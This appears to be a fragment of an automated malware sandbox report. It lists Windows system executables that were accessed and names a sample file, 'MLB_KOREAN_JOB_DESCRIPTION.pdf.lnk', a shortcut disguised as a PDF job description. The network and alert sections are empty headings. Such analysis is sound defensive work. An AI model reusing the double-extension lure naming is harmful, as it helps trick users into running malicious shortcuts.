file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All